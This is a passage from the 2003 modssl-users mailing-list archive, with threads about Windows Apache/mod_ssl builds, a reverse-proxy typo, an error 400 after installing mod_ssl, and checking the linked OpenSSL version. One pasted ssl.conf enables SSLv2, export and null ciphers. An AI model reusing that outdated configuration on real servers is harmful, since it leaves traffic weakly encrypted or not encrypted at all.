> Tnx! Sincerely, Edwin Cleton
> 
> On 26 Mar 2003 04:25 , hunter  sent:
> 
> >On Wed, 2003-03-26 at 03:31, Edwin Cleton wrote:
> >> Hunter,
> >> 
> >> Could you possibly compile a version with openssl 0.9.6i ?
> >> (apache 1.3.27, mod_ssl 2.8.14 and openssl 0.9.6i, win32, and the openssl dll files)
> >> 
> >> I am having mayor problems with 0.9.7a under windows including problems with stunnel dos and windows version.
> >> 
> >> Sincerely, Edwin Cleton
> >> 
> >> Ecl@Diagram.nl - Technical Support Engineer
> >> 
> >Edwin,
> >
> >Done...
> >
> >http://tor.ath.cx/~hunter/apache/Apache_1.3.27-Mod_SSL_2.8.14-Openssl_0.9.6i-Win32.zip
> >http://tor.ath.cx/~hunter/apache/Openssl-0.9.6i-Win32.zip
> >
> >Let me know how you make out with these...
> >
> >Chris
> >
> >
> 
> 
Edwin,

I am happy that this has helped.

I have cc'd the mod_ssl list so that perhaps someone can look into it. I
am not involved with the developers of the code. I only build the
Windows binaries for people.

Chris


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Mar 27 10:23:22 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id D8E542AA02E; Thu, 27 Mar 2003 10:23:22 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mag05.bb.admin.ch (fwigk1.admin.ch [193.5.216.70])
	by master.modssl.org (Postfix) with ESMTP id 4B46F2AA01A
	for ; Thu, 27 Mar 2003 10:23:21 +0100 (CET)
Received: from mar02.bb.admin.ch (mar02.bb.admin.ch [193.5.222.72])
	by mag05.bb.admin.ch (8.12.8/8.12.8) with ESMTP id h2R9NCDT028922
	for ; Thu, 27 Mar 2003 10:23:13 +0100 (MET)
Received: from mas21.bb.admin.ch (mas21.bb.admin.ch [193.5.222.82])
	by mar02.bb.admin.ch (8.12.8/8.12.8) with SMTP id h2R9HAfb003631
	for ; Thu, 27 Mar 2003 10:17:11 +0100 (MET)
Received: by ad01008exc.ad.admin.ch with Internet Mail Service (5.5.2653.19)
	id ; Thu, 27 Mar 2003 10:17:10 +0100
Message-ID: 
From: Michael.Straessle@bk.admin.ch
To: modssl-users@modssl.org
Subject: Re: Problem with Reverse Proxy and Client authentication
Date: Thu, 27 Mar 2003 10:17:07 +0100
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Michael.Straessle@bk.admin.ch
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

hi steffen


>ProxyPass /myapp https://backendserver/app
>ProxyPassReverse /myapp/ https://backendserver/app/

....any specific reason for the missing trailing slashes in the ProxyPass
directive, or is this only a typo?

regards
michael
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Mar 27 10:36:25 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 06DF12AA02E; Thu, 27 Mar 2003 10:36:24 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from relay.westlb.de (relay.westlb.de [195.27.219.2])
	by master.modssl.org (Postfix) with ESMTP id 084B72AA01A
	for ; Thu, 27 Mar 2003 10:36:24 +0100 (CET)
Received: from fw05a.westlb.sko.de (zizi.westlb.de [193.22.163.2])
	by relay.westlb.de (Postfix) with SMTP id 0431922802E
	for ; Thu, 27 Mar 2003 10:36:21 +0100 (CET)
Received: from ntsnotes0010019.zs.westlb.sko.de by fw05a.westlb.sko.de
          via smtpd (for relay.westlb.de [195.27.219.2]) with SMTP; 27 Mar 2003 09:36:21 UT
Subject: Antwort: Re: Problem with Reverse Proxy and Client authentication
To: modssl-users@modssl.org
Message-ID: 
From: IBM_fischers@wpsbank.de
Date: Thu, 27 Mar 2003 10:36:11 +0100
MIME-Version: 1.0
Content-type: text/plain; charset=iso-8859-1
Content-transfer-encoding: quoted-printable
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: IBM_fischers@wpsbank.de
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users



Hallo Michael,

ja, nur Tippfehler. Das Problem ist mittlerweile behoben. ModSSL hatte
Schwierigkeiten mit dem Clientzertifikat, was OpenSSL erzeugt hat. Von =
Hand
gepatched funktioniert das jetzt.



Mit freundlichen Gr=FC=DFen
--
Steffen Fischer, I/T Architect
IBM Deutschland GmbH, Karl-Arnold-Platz 1a, D-40474 Duesseldorf
Tel: +49 (0) 211 476-2986 Fax: -2391 Mobile: +49 (0) 175 433 1187
email: steffen.fischer@de.ibm.com
project email: ibm_fischers@wpsbank.de
project phone: +49 (0) 211 826 - 74276


                                                                       =
                                                            =20
                                                                       =
                                                            =20
                                                                       =
                                                            =20
          Michael.Straessle@bk.admin.ch                                =
                                                            =20
                                                                       =
                                                            =20
          Gesendet von: owner-modssl-users@modssl.org                  =
                                                            =20
                                                                       =
                                                            =20
                                                                       =
                                                            =20
          27.03.03 10:17                                               =
                                                            =20
                                                                       =
                                                            =20
                                                                       =
                                                            =20
          Bitte antworten an modssl-users                              =
                                                            =20
                                                                       =
                                                            =20
                                                                       =
                                                            =20
                                                                       =
                                                            =20
                                                                       =
                                                            =20


An:    modssl-users@modssl.org
Kopie:
Thema: Re: Problem with Reverse Proxy and Client authentication


hi steffen


>ProxyPass /myapp https://backendserver/app
>ProxyPassReverse /myapp/ https://backendserver/app/

....any specific reason for the missing trailing slashes in the ProxyPa=
ss
directive, or is this only a typo?

regards
michael
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org




|------------------------------------+---------------------------------=
---|
|Diese Nachricht ist vertraulich. Sie|This message is confidential and =
may|
|ist ausschliesslich fuer            |be privileged. It is             =
   |
|den im Adressfeld ausgewiesenen     |intended solely for the named    =
   |
|Adressaten bestimmt.                |addressee. If you are not the    =
   |
|Sollten Sie nicht der vorgesehene   |intended recipient please inform =
us.|
|Empfaenger sein, so bitten          |Any unauthorised                 =
   |
|wir um eine kurze Nachricht. Jede   |dissemination, distribution or   =
   |
|unbefugte Weiterleitung             |copying hereof is prohibited.    =
   |
|oder Fertigung einer Kopie ist      |As we cannot guarantee the       =
   |
|unzulaessig. Da wir nicht die       |genuineness or completeness of   =
   |
|Echtheit oder Vollstaendigkeit der  |the information contained in this=
   |
|in dieser Nachricht                 |message, the statements          =
   |
|enthaltenen Informationen           |set forth above are not legally  =
   |
|garantieren koennen, schliessen wir |binding. In connection           =
   |
|die rechtliche Verbindlichkeit der  |therewith, we also refer to our  =
   |
|vorstehenden Erklaerungen           |governing regulations of         =
   |
|und Aeusserungen aus. Wir verweisen |concerning signatory authority   =
   |
|in diesem Zusammenhang              |published in the                 =
   |
|auch auf die  fuer uns geltenden    |standard bank or company signatur=
e  |
|Regelungen ueber die                |lists with regard to the         =
   |
|Verbindlichkeit von                 |legally binding effect of stateme=
nts|
|Willenserklaerungen mit             |made with the intent to          =
   |
|verpflichtendem                     |obligate us.                     =
   |
|Inhalt, die in den bank- bzw.       |                                 =
   |
|unternehmensueblichen               |                                 =
   |
|Unterschriftenverzeichnissen bekannt|                                 =
   |
|gemacht werden.                     |                                 =
   |
|------------------------------------+---------------------------------=
---|


=


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Mar 29 12:04:00 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id DB7EF2AA03C; Sat, 29 Mar 2003 12:03:59 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from main.gmane.org (main.gmane.org [80.91.224.249])
	by master.modssl.org (Postfix) with ESMTP id AAA372AA01A
	for ; Sat, 29 Mar 2003 12:03:57 +0100 (CET)
Received: from list by main.gmane.org with local (Exim 3.35 #1 (Debian))
	id 18zE7e-0004UX-00
	for ; Sat, 29 Mar 2003 12:03:38 +0100
X-Injected-Via-Gmane: http://gmane.org/
To: modssl-users@modssl.org
Received: from news by main.gmane.org with local (Exim 3.35 #1 (Debian))
	id 18zE7d-0004UG-00
	for ; Sat, 29 Mar 2003 12:03:37 +0100
From: "Timothée GROS" 
Subject: APache 2.x + Mod_ssl : Ive a problem!
Date: Sat, 29 Mar 2003 11:03:36 +0000 (UTC)
Organization: Charityemail.net
Lines: 272
Message-ID: 
X-Complaints-To: usenet@main.gmane.org
User-Agent: Xnews/5.04.25
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Timothée GROS" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I cant't have my Apache with mod_ssl working:
I have Apache 2 directly installed from the RPM of Redhat 8.0
idem for mod_ssl 


Here is my /etc/httpd/conf.d/ssl.conf
It is the .conf installed by the rpm slightly modified by myself (I should never have done that!)


#
# This is the Apache server configuration file providing SSL support.
# It contains the configuration directives to instruct the server how to
# serve pages over an https connection. For detailing information about these
# directives see 
#
#   For the moment, see  for this info.
#   The documents are still being prepared from material donated by the
#   modssl project.
#
# Do NOT simply read the instructions in here without understanding
# what they do.  They're here only as hints or reminders.  If you are unsure
# consult the online docs. You have been warned.
#

LoadModule ssl_module modules/mod_ssl.so

#   Until documentation is completed, please check http://www.modssl.org/
#   for additional config examples and module docmentation.  Directives
#   and features of mod_ssl are largely unchanged from the mod_ssl project
#   for Apache 1.3.

#
# When we also provide SSL we have to listen to the
# standard HTTP port (see above) and to the HTTPS port
#
Listen 443

#
# Dynamic Shared Object (DSO) Support
#
# To be able to use the functionality of a module which was built as a DSO you
#    ErrorLog logs/dummy-host.example.com-error_log
#    CustomLog logs/dummy-host.example.com-access_log common

##
##  SSL Global Context
##
##  All SSL configuration in this context applies both to
##  the main server and all SSL-enabled virtual hosts.
##

#
#   Some MIME-types for downloading Certificates and CRLs
#
AddType application/x-x509-ca-cert .crt
AddType application/x-pkcs7-crl    .crl

#   Pass Phrase Dialog:
#   Configure the pass phrase gathering process.
#   The filtering dialog program (`builtin' is a internal
#   terminal dialog) has to provide the pass phrase on stdout.
SSLPassPhraseDialog  builtin

#   Inter-Process Session Cache:
#   Configure the SSL Session Cache: First the mechanism
#   to use and second the expiring timeout (in seconds).
#SSLSessionCache        none
#SSLSessionCache        shmht:/var/cache/mod_ssl/scache(512000)
#SSLSessionCache        shmcb:/var/cache/mod_ssl/scache(512000)
SSLSessionCache         dbm:/var/cache/mod_ssl/scache
SSLSessionCacheTimeout  300

#   Semaphore:
#   Configure the path to the mutual exclusion semaphore the
#   SSL engine uses internally for inter-process synchronization.
SSLMutex  file:logs/ssl_mutex

#   Pseudo Random Number Generator (PRNG):
#   Configure one or more sources to seed the PRNG of the
#   SSL library. The seed data should be of good random quality.
#   WARNING! On some platforms /dev/random blocks if not enough entropy
#   is available. This means you then cannot use the /dev/random device
#   because it would lead to very long connection times (as long as
#   it requires to make more entropy available). But usually those
#   platforms additionally provide a /dev/urandom device which doesn't
#   block. So, if available, use this one instead. Read the mod_ssl User
#   Manual for more details.
SSLRandomSeed startup builtin
SSLRandomSeed connect builtin
#SSLRandomSeed startup file:/dev/random  512
#SSLRandomSeed startup file:/dev/urandom 512
#SSLRandomSeed connect file:/dev/random  512
#SSLRandomSeed connect file:/dev/urandom 512

##
## SSL Virtual Host Context
##



#  General setup for the virtual host
DocumentRoot "/charity/web/https"
ServerName 213.121.253.7:443
ServerAdmin admin@charityemail.net
ErrorLog logs/ssl_error_log
TransferLog logs/ssl_access_log

#   SSL Engine Switch:
#   Enable/Disable SSL for this virtual host.
SSLEngine on

#   SSL Cipher Suite:
#   List the ciphers that the client is permitted to negotiate.
#   See the mod_ssl documentation for a complete list.
SSLCipherSuite ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL

#   Server Certificate:
#   Point SSLCertificateFile at a PEM encoded certificate.  If
#   the certificate is encrypted, then you will be prompted for a
#   pass phrase.  Note that a kill -HUP will prompt again. A test
#   certificate can be generated with `make certificate' under
#   built time. Keep in mind that if you've both a RSA and a DSA
#   certificate you can configure both in parallel (to also allow
#   the use of DSA ciphers, etc.)
SSLCertificateFile /etc/httpd/conf/ssl.crt/server.crt
#SSLCertificateFile /etc/httpd/conf/ssl.crt/server-dsa.crt

#   Server Private Key:
#   If the key is not combined with the certificate, use this
#   directive to point at the key file.  Keep in mind that if
#   you've both a RSA and a DSA private key you can configure
#   both in parallel (to also allow the use of DSA ciphers, etc.)
SSLCertificateKeyFile /etc/httpd/conf/ssl.key/server.key
#SSLCertificateKeyFile /etc/httpd/conf/ssl.key/server-dsa.key

#   Server Certificate Chain:
#   Point SSLCertificateChainFile at a file containing the
#   concatenation of PEM encoded CA certificates which form the
#   certificate chain for the server certificate. Alternatively
#   the referenced file can be the same as SSLCertificateFile
#   when the CA certificates are directly appended to the server
#   certificate for convinience.
#SSLCertificateChainFile /etc/httpd/conf/ssl.crt/ca.crt

#   Certificate Authority (CA):
#   Set the CA certificate verification path where to find CA
#   certificates for client authentication or alternatively one
#   huge file containing all of them (file must be PEM encoded)
#   Note: Inside SSLCACertificatePath you need hash symlinks
#         to point to the certificate files. Use the provided
#         Makefile to update the hash symlinks after changes.
#SSLCACertificatePath /etc/httpd/conf/ssl.crt
#SSLCACertificateFile /etc/httpd/conf/ssl.crt/ca-bundle.crt

#   Certificate Revocation Lists (CRL):
#   Set the CA revocation path where to find CA CRLs for client
#   authentication or alternatively one huge file containing all
#   of them (file must be PEM encoded)
#   Note: Inside SSLCARevocationPath you need hash symlinks
#         to point to the certificate files. Use the provided
#         Makefile to update the hash symlinks after changes.
#SSLCARevocationPath /etc/httpd/conf/ssl.crl
#SSLCARevocationFile /etc/httpd/conf/ssl.crl/ca-bundle.crl

#   Client Authentication (Type):
#   Client certificate verification type and depth.  Types are
#   none, optional, require and optional_no_ca.  Depth is a
#   number which specifies how deeply to verify the certificate
#   issuer chain before deciding the certificate is not valid.
#SSLVerifyClient require
#SSLVerifyDepth  10

#   Access Control:
#   With SSLRequire you can do per-directory access control based
#   on arbitrary complex boolean expressions containing server
#   variable checks and other lookup directives.  The syntax is a
#   mixture between C and Perl.  See the mod_ssl documentation
#   for more details.
#
#SSLRequire (    %{SSL_CIPHER} !~ m/^(EXP|NULL)/ \
#            and %{SSL_CLIENT_S_DN_O} eq "Snake Oil, Ltd." \
#            and %{SSL_CLIENT_S_DN_OU} in {"Staff", "CA", "Dev"} \
#            and %{TIME_WDAY} >= 1 and %{TIME_WDAY} <= 5 \
#            and %{TIME_HOUR} >= 8 and %{TIME_HOUR} <= 20       ) \
#           or %{REMOTE_ADDR} =~ m/^192\.76\.162\.[0-9]+$/
#

#   SSL Engine Options:
#   Set various options for the SSL engine.
#   o FakeBasicAuth:
#     Translate the client X.509 into a Basic Authorisation.  This means that
#     the standard Auth/DBMAuth methods can be used for access control.  The
#     user name is the `one line' version of the client's X.509 certificate.
#     Note that no password is obtained from the user. Every entry in the user
#     file needs this password: `xxj31ZMTZzkVA'.
#   o ExportCertData:
#     This exports two additional environment variables: SSL_CLIENT_CERT and
#     SSL_SERVER_CERT. These contain the PEM-encoded certificates of the
#     server (always existing) and the client (only existing when client
#     authentication is used). This can be used to import the certificates
#     into CGI scripts.
#   o StdEnvVars:
#     This exports the standard SSL/TLS related `SSL_*' environment variables.
#     Per default this exportation is switched off for performance reasons,
#     because the extraction step is an expensive operation and is usually
#     useless for serving static content. So one usually enables the
#     exportation for CGI and SSI requests only.
#   o CompatEnvVars:
#     This exports obsolete environment variables for backward compatibility
#     to Apache-SSL 1.x, mod_ssl 2.0.x, Sioux 1.0 and Stronghold 2.x. Use this
#     to provide compatibility to existing CGI scripts.
#   o StrictRequire:
#     This denies access when "SSLRequireSSL" or "SSLRequire" applied even
#     under a "Satisfy any" situation, i.e. when it applies access is denied
#     and no other module can change it.
#   o OptRenegotiate:
#     This enables optimized SSL connection renegotiation handling when SSL
#     directives are used in per-directory context.
#SSLOptions +FakeBasicAuth +ExportCertData +CompatEnvVars +StrictRequire

    SSLOptions +StdEnvVars


    SSLOptions +StdEnvVars


#   SSL Protocol Adjustments:
#   The safe and default but still SSL/TLS standard compliant shutdown
#   approach is that mod_ssl sends the close notify alert but doesn't wait for
#   the close notify alert from client. When you need a different shutdown
#   approach you can use one of the following variables:
#   o ssl-unclean-shutdown:
#     This forces an unclean shutdown when the connection is closed, i.e. no
#     SSL close notify alert is send or allowed to received.  This violates
#     the SSL/TLS standard but is needed for some brain-dead browsers. Use
#     this when you receive I/O errors because of the standard approach where
#     mod_ssl sends the close notify alert.
#   o ssl-accurate-shutdown:
#     This forces an accurate shutdown when the connection is closed, i.e. a
#     SSL close notify alert is send and mod_ssl waits for the close notify
#     alert of the client. This is 100% SSL/TLS standard compliant, but in
#     practice often causes hanging connections with brain-dead browsers. Use
#     this only for browsers where you know that their SSL implementation
#     works correctly.
#   Notice: Most problems of broken clients are also related to the HTTP
#   keep-alive facility, so you usually additionally want to disable
#   keep-alive for those clients, too. Use variable "nokeepalive" for this.
#   Similarly, one has to force some clients to use HTTP/1.0 to workaround
#   their broken HTTP/1.1 implementation. Use variables "downgrade-1.0" and
#   "force-response-1.0" for this.
SetEnvIf User-Agent ".*MSIE.*" \
         nokeepalive ssl-unclean-shutdown \
         downgrade-1.0 force-response-1.0

#   Per-Server Logging:
#   The home of a custom SSL log file. Use this when you want a
#   compact non-error SSL logfile on a virtual host basis.
CustomLog logs/ssl_request_log \
          "%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b"





Still reading me ? So i explain you my problem:
since i have installed mod_ssl, i have an error 400 when trying to access to my non-ssl page.
where can it come from ?

Tell me if you want that i post my conplete httpd.conf file.

Thank you for reading me and for your help.
Timoth‚e GROS

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Mar 31 12:29:02 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id CEB352AA037; Mon, 31 Mar 2003 12:29:02 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from maggotts.rnib.org.uk (maggotts.rnib.org.uk [194.128.16.48])
	by master.modssl.org (Postfix) with ESMTP id 7E16D2AA01A
	for ; Mon, 31 Mar 2003 12:29:01 +0200 (CEST)
Received: from pboroweb.rnib.org.uk (pboroweb.rnib.org.uk [194.128.16.17])
	by maggotts.rnib.org.uk (8.11.6/8.11.6) with ESMTP id h2VASTu18844
	for ; Mon, 31 Mar 2003 11:28:49 +0100
Received: by pboroweb.rnib.org.uk with Internet Mail Service (5.5.2650.21)
	id ; Mon, 31 Mar 2003 11:28:24 +0100
Message-ID: <9B66BBD37D5DD411B8CE00508B69700F033F2851@pborolocal.rnib.org.uk>
From: John.Airey@rnib.org.uk
To: modssl-users@modssl.org
Subject: RE: APache 2.x + Mod_ssl : Ive a problem!
Date: Mon, 31 Mar 2003 11:28:22 +0100
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: John.Airey@rnib.org.uk
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Did you install the mod_ssl package too? Did you know that Red Hat =
renamed
the package from "apache" to "httpd" (for some kind of consistency I =
guess,
although confusing to those who know about it already).

-=20
John Airey, BSc (Jt Hons), CNA, RHCE
Internet systems support officer, ITCSD, Royal National Institute of =
the
Blind,
Bakewell Road, Peterborough PE2 6XU,
Tel.: +44 (0) 1733 375299 Fax: +44 (0) 1733 370848 =
John.Airey@rnib.org.uk=20

Anyone who believes in Evolution as fact just because they were told so =
at
school seems to have missed the relevance of the renaissance.


> -----Original Message-----
> From: Timoth=E9e GROS [mailto:sorg@netcourrier.com]
> Sent: 29 March 2003 11:04
> To: modssl-users@modssl.org
> Subject: APache 2.x + Mod_ssl : Ive a problem!
>=20
>=20
> I cant't have my Apache with mod_ssl working:
> I have Apache 2 directly installed from the RPM of Redhat 8.0
> idem for mod_ssl=20
>=20
[snip]=20

-=20

NOTICE: The information contained in this email and any attachments is=20
confidential and may be legally privileged. If you are not the=20
intended recipient you are hereby notified that you must not use,=20
disclose, distribute, copy, print or rely on this email's content. If=20
you are not the intended recipient, please notify the sender=20
immediately and then delete the email and any attachments from your=20
system.

RNIB has made strenuous efforts to ensure that emails and any=20
attachments generated by its staff are free from viruses. However, it=20
cannot accept any responsibility for any viruses which are=20
transmitted. We therefore recommend you scan all attachments.

Please note that the statements and views expressed in this email=20
and any attachments are those of the author and do not necessarily=20
represent those of RNIB.

RNIB Registered Charity Number: 226227

Website: http://www.rnib.org.uk=20
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Mar 31 16:50:51 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 3B1102AA037; Mon, 31 Mar 2003 16:50:51 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from netc-4v.grolier.fr (netc-4v.grolier.fr [194.158.97.228])
	by master.modssl.org (Postfix) with ESMTP id 0C4562AA01A
	for ; Mon, 31 Mar 2003 16:50:45 +0200 (CEST)
Received: from netcourrier.com (netcourrier-3m.netcourrier.com [194.158.104.103])
	by netc-4v.grolier.fr (Postfix) with SMTP id 25B49C694
	for ; Mon, 31 Mar 2003 16:50:38 +0200 (CEST)
Received: from [212.234.180.194] by netcourrier-3m.netcourrier.com via html
	interface;
From: =?iso-8859-1?Q?Timoth=E9e_GROS?= 
To: modssl-users@modssl.org
Subject: Re: RE: APache 2.x + Mod_ssl : Ive a problem!
Date: Mon, 31 Mar 2003 16:50:39 CEST
Mime-Version: 1.0
X-Mailer: Medianet/v2.0
Message-Id: 
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: =?iso-8859-1?Q?Timoth=E9e_GROS?= 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

>Did you install the mod=5Fssl package too?

Yes of course=21

> Did you know that Red Hat renamed
>the package from =22apache=22 to =22httpd=22 (for some kind of consistenc=
y I guess,
>although confusing to those who know about it already).

Yes I know, I have installed it via  =22up2date httpd=22

-------------------------------------------------------------
NetCourrier, votre bureau virtuel sur Internet : Mail, Agenda, Clubs, Tool=
bar...
Web/Wap : www.netcourrier.com
T=E9l=E9phone/Fax : 08 92 69 00 21 (0,34 =80 TTC/min)
Minitel: 3615 NETCOURRIER (0,15 =80 TTC/min)

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Apr  1 07:01:15 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 7E8D32AA037; Tue,  1 Apr 2003 07:01:15 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from dhcp-210-105 (24.247.16.149.tvc.mi.chartermi.net [24.247.16.149])
	by master.modssl.org (Postfix) with ESMTP id 99BF32AA019
	for ; Tue,  1 Apr 2003 07:01:13 +0200 (CEST)
Received: from localhost.localdomain (localhost.localdomain [127.0.0.1])
	by dhcp-210-105 (8.11.6/8.11.6) with ESMTP id h3152Ln01850
	for ; Tue, 1 Apr 2003 00:02:22 -0500
Subject: Verifying OpenSSL Version in mod_ssl
From: Ken Schweigert 
To: modssl-users@modssl.org
Content-Type: text/plain
Content-Transfer-Encoding: 7bit
X-Mailer: Ximian Evolution 1.0.8 (1.0.8-9.7x) 
Date: 01 Apr 2003 00:02:21 -0500
Message-Id: <1049173342.1076.37.camel@dhcp-210-105>
Mime-Version: 1.0
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Ken Schweigert 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I've been getting this error ever since I upgraded to
mod_ssl-2.8.14-1.3.27:

[Fri Mar 28 16:44:47 2003] [error] mod_ssl: Cannot store SSL session to
DBM file `/usr/local/apache/logs/ssl_scache' (System error follows)
[Fri Mar 28 16:44:47 2003] [error] System: Invalid argument (errno: 22)

When trying to debug the problem, I wanted to verify that mod_ssl was
compiled with the recently upgraded OpenSSL-0.9.7a.  Usually I just
use 'strings' and grep for 'openssl'.  However, when I do it against
libssl.so, it returns a string that looks like the version is 0.9.6c :

[root@www ssl]# strings libssl.so | grep -i "openssl"
OpenSSL
Spurious SSL handshake interrupt[Hint: Usually just one of those OpenSSL
confusions!?]
OpenSSL
OpenSSL
 (System and OpenSSL library errors follow)
 (OpenSSL library error follows)
OpenSSL
OpenSSL 0.9.6c 21 dec 2001
[root@www ssl]#

Version 0.9.6c hasn't been on the box in years, so I'm not sure if what
I'm seeing is the actually the real version of just something linked in.

This is what I see from configure:

[root@www mod_ssl-2.8.14-1.3.27]# ./configure
--with-apache=../apache_1.3.27 --with-ssl=../openssl-0.9.7a
--with-mm=../mm-1.3.0
Configuring mod_ssl/2.8.14 for Apache/1.3.27
 + Apache location: ../apache_1.3.27 (Version 1.3.27)
 + OpenSSL location: ../openssl-0.9.7a
 + MM location: ../mm-1.3.0
 + Auxiliary patch tool: ./etc/patch/patch (local)
 + Applying packages to Apache source tree:

 + adding selected modules
    o ssl_module uses ConfigStart/End
      + SSL interface: mod_ssl/2.8.14
      + SSL interface build type: OBJ
      + SSL interface compatibility: enabled
      + SSL interface experimental code: disabled
      + SSL interface conservative code: disabled
      + SSL interface vendor extensions: disabled
      + SSL interface plugin: Built-in SDBM
      + SSL library path: /usr/src/APACHE-1.3.27/openssl-0.9.7a
      + SSL library version: OpenSSL 0.9.7a Feb 19 2003

And this is what I see from Apache's configure:
[root@www apache_1.3.27]# ./go-apache2.sh 
Configuring for Apache, Version 1.3.27
 + using installation path layout: Apache (config.layout)
Creating Makefile
Creating Configuration.apaci in src
Creating Makefile in src
 + configured for Linux platform
 + setting C compiler to gcc
 + setting C pre-processor to gcc -E
 + checking for system header files
 + adding selected modules
    o rewrite_module uses ConfigStart/End
 + using -lndbm for DBM support
      enabling DBM support for mod_rewrite
    o ssl_module uses ConfigStart/End
      + SSL interface: mod_ssl/2.8.14
      + SSL interface build type: DSO
      + SSL interface compatibility: enabled
      + SSL interface experimental code: disabled
      + SSL interface conservative code: disabled
      + SSL interface vendor extensions: disabled
      + SSL interface plugin: Built-in SDBM
      + SSL library path: /usr/src/APACHE-1.3.27/openssl-0.9.7a
      + SSL library version: OpenSSL 0.9.7a Feb 19 2003



Can anyone help with determining the actual version?  Or if this is
irrelevant to determining the original error, I would appreciate a
pointer to what might help.

Thanks!
-- 
Ken Schweigert, Network Administrator
Byte Productions, LLC
http://www.byte-productions.com


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Apr  1 07:39:12 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 008332AA037; Tue,  1 Apr 2003 07:39:11 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from sol-roth.sgwebspace.com (mail.sgwebspace.com [63.226.251.129])
	by master.modssl.org (Postfix) with ESMTP id D1CBC2AA019
	for ; Tue,  1 Apr 2003 07:39:10 +0200 (CEST)
Received: from soylent (sgt-thorn.sgwebspace.com [63.226.251.130])
	by sol-roth.sgwebspace.com (Sols Mailer Daemon) with ESMTP id 6C851BEE15
	for ; Mon, 31 Mar 2003 21:32:20 -0800 (PST)
From: "Jeff Bert" 
To: 
Subject: RE: Verifying OpenSSL Version in mod_ssl
Date: Mon, 31 Mar 2003 21:39:06 -0800
Message-ID: <000201c2f811$0486a2a0$0301a8c0@soylent>
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook, Build 10.0.4510
